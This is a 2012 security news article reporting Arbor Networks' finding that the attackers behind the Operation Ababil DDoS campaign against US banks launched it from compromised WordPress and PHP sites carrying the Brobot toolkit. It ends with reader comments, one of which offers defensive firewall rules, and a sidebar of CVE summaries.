Attacks/Breaches
12/14/2012
11:01 AM
Connect Directly
RSS
E-Mail
50%
50%

Bank Attackers Used PHP Websites As Launch Pads

WordPress sites with outdated TimThumb plug-in were among PHP-based sites hackers used to launch this fall's massive DDoS attacks, reports Arbor Network.

Who Is Hacking U.S. Banks? 8 Facts
Who Is Hacking U.S. Banks? 8 Facts
(click image for larger view and for slideshow)
The group that began targeting U.S. bank websites in September launched their large-scale, distributed denial-of-service (DDoS) attacks via a number of PHP-based websites that they'd previously exploited.

That finding comes from Arbor Networks, which said that attackers had compromised numerous PHP Web applications, such as Joomla, as well as many WordPress sites, many of which were using an outdated version of the TimThumb plug-in. After compromising the sites, attackers then loaded toolkits onto the sites that turned them into DDoS attack launch pads.

"Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools," according to a blog post by Dan Holden and Curt Wilson, who are part of the security engineering and response team at Arbor Networks.

[ Build bullet-proof Web apps. Read 6 Ways To Strengthen Web App Security. ]

After compromising the PHP-based websites and loading their attack toolkits, the bank attackers then either connected directly to the sites to issue commands, or else used intermediate servers, proxies or scripts. The particular attack tool that was most used by attackers, according to Arbor, was the "itsoknoproblembro" toolkit, which is also known as Brobot. Two other tools, KamiKaze and AMOS, were also used, but less frequently.

Those tools enabled attackers to launch "a mix of application layer attacks on HTTP, HTTPS and DNS with volumetric attack traffic on a variety of TCP, UDP, ICMP and other IP protocols," said Holden and Wilson. "The other obvious and uncommon factor at play was the launch of simultaneous attacks, at high bandwidth, to multiple companies in the same vertical."

The scale of those DDoS attacks disrupted the websites of leading Wall Street firms, including Bank of America, BB&T, JPMorgan Chase, Capital One, HSBC, New York Stock Exchange, Regions Financial, SunTrust, U.S. Bank and Wells Fargo. That was despite the attackers previewing which sites would be attacked, as well as the date and time their attacks would commence.

In late October, after more than a month of bank website attacks, the hacktivist group that claimed credit for the so-called Operational Ababil campaign promised a pause in its efforts. But the group broke its silence earlier this week, when it reemerged and promised to begin attacks this week against Bank of America, JPMorgan Chase, PNC Financial Services Group, SunTrust Banks and U.S. Bancorp.

Those attacks appeared to recommence Tuesday. A spokesman for PNC confirmed Thursday via email that the bank's website had been seeing "an unusual volume of electronic traffic at our Internet connection." But he declined to comment on whether that traffic had been caused by DDoS attacks.

According to Arbor, the new attacks "looked similar in construction to Brobot v1, however there is a newly crafted DNS packet attack and a few other attack changes in Brobot v2," showing that attackers' techniques are continuing to evolve.

What lessons can businesses draw from the Arbor finding that the DDoS bank attackers are using vulnerable WordPress and PHP sites as staging grounds? For starters, businesses should keep an eye on their websites for signs of outdated or unsecured PHP applications -- and not just to help prevent DDoS attacks. Indeed, criminals often use exploited websites to launch attacks and store stolen information.

"WordPress enables these organizations to set up an infrastructure on the Internet that exacerbates the challenge of locating them," said Jim Butterworth, CSO of HBGary, speaking by phone. "They're using it as an opportunistic technique for lifting stolen information, more so than using WordPress as an attack vector."

The gang behind the Eurograbber attack campaign, for example, reportedly used Zitmo Trojan spyware to steal $47 million or more from over 30,000 corporate and private banking customers. Although the gang used command-and-control servers to manage PCs infected with its malware, it had also exploited PHP websites to create drop zones for storing stolen information, as well as for pushing additional attack code to infected PCs. Using drop zones -- as a kind of criminal Dropbox -- helps attackers better cover their tracks and evade security defenses.

Despite those criminal tactics, Butterworth said businesses shouldn't avoid using PHP-based applications such as WordPress. Instead, they should inventory which PHP applications are being used, log network traffic to reveal inbound PHP requests that expose would-be attackers probing for such applications, and ensure that the PHP applications remain hardened against the toolkits and vulnerabilities used to exploit them. "Locate, patch and watch. That's the advice," he said.

Storing and protecting data are critical components of any successful cloud solution. Join our webcast, Cloud Storage Drivers: Auto-provisioning, Virtualization, Encryption, to stay ahead of the curve on automated and self-service storage, enterprise class data protection and service level management. Watch now or bookmark for later.

Comment  | 
Print  | 
More Insights
Comments
Oldest First  |  Newest First  |  Threaded View
MarkSitkowski
50%
50%
MarkSitkowski,
User Rank: Moderator
4/5/2013 | 4:58:18 AM
re: Bank Attackers Used PHP Websites As Launch Pads
Instead of waiting for your kernel to get overwhelmed with DNS replies for which it never asked, do this in your firewall:

block in on e1000g0 proto udp all
pass in on e1000g0 proto udp from our.dns.server1/32
pass in on e1000g0 proto udp from our.dns.server2/32
pass in on e1000g0 proto udp from any.xdmcp.box/32

The Unix kernel never sees any of that garbage, and the machine doesn't fall over.
SpamIsLame
50%
50%
SpamIsLame,
User Rank: Apprentice
4/29/2013 | 9:35:17 PM
re: Bank Attackers Used PHP Websites As Launch Pads
I was recently brought in to investigate why a specific Unix web server was suddenly running this DDOS code. None of this appears to be documented anywhere. The results of my investigations so far are disappointing and troubling. There are a lot of really vulnerable servers out there being used for free by the criminal community at large.

The criminals behind this operation are placing code on very vulnerable, unsecured unix servers running PHP. If that PHP server allows an "eval" command to be run that allows a script to perform high-level, near-root-level functions like shutting down logging and restarting the web server, they place a file on it that allows it to run ANY command it receives, using the "eval" function.

This is why there's a bunch of reports out there that talk about how the botnet "learning" or "gaining new powers". It's a really wide-open, non-secure server that will run *any* command. It's not "learning". It's at the mercy of any idiot who knows how to send it a large sequence of commands to run.

SiL
Register for Dark Reading Newsletters
Partner Perspectives
What's This?
In a digital world inundated with advanced security threats, Intel Security seeks to transform how we live and work to keep our information secure. Through hardware and software development, Intel Security delivers robust solutions that integrate security into every layer of every digital device. In combining the security expertise of McAfee with the innovation, performance, and trust of Intel, this vision becomes a reality.

As we rely on technology to enhance our everyday and business life, we must too consider the security of the intellectual property and confidential data that is housed on these devices. As we increase the number of devices we use, we increase the number of gateways and opportunity for security threats. Intel Security takes the “security connected” approach to ensure that every device is secure, and that all security solutions are seamlessly integrated.
Featured Writers
White Papers
Cartoon
Current Issue
Dark Reading's October Tech Digest
Fast data analysis can stymie attacks and strengthen enterprise security. Does your team have the data smarts?
Flash Poll
Video
Slideshows
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2012-2413
Published: 2014-10-20
Cross-site scripting (XSS) vulnerability in the ja_purity template for Joomla! 1.5.26 and earlier allows remote attackers to inject arbitrary web script or HTML via the Mod* cookie parameter to html/modules.php.

CVE-2012-5244
Published: 2014-10-20
Multiple SQL injection vulnerabilities in Banana Dance B.2.6 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) return, (2) display, (3) table, or (4) search parameter to functions/suggest.php; (5) the id parameter to functions/widgets.php, (6) the category parameter to...

CVE-2012-5694
Published: 2014-10-20
Multiple SQL injection vulnerabilities in Bulb Security Smartphone Pentest Framework (SPF) before 0.1.3 allow remote attackers to execute arbitrary SQL commands via the (1) agentPhNo, (2) controlPhNo, (3) agentURLPath, (4) agentControlKey, or (5) platformDD1 parameter to frameworkgui/attach2Agents.p...

CVE-2012-5695
Published: 2014-10-20
Multiple cross-site request forgery (CSRF) vulnerabilities in Bulb Security Smartphone Pentest Framework (SPF) 0.1.2 through 0.1.4 allow remote attackers to hijack the authentication of administrators for requests that conduct (1) shell metacharacter or (2) SQL injection attacks or (3) send an SMS m...

CVE-2012-5696
Published: 2014-10-20
Bulb Security Smartphone Pentest Framework (SPF) before 0.1.3 does not properly restrict access to frameworkgui/config, which allows remote attackers to obtain the plaintext database password via a direct request.

Best of the Web
Dark Reading Radio
Archived Dark Reading Radio
Follow Dark Reading editors into the field as they talk with noted experts from the security world.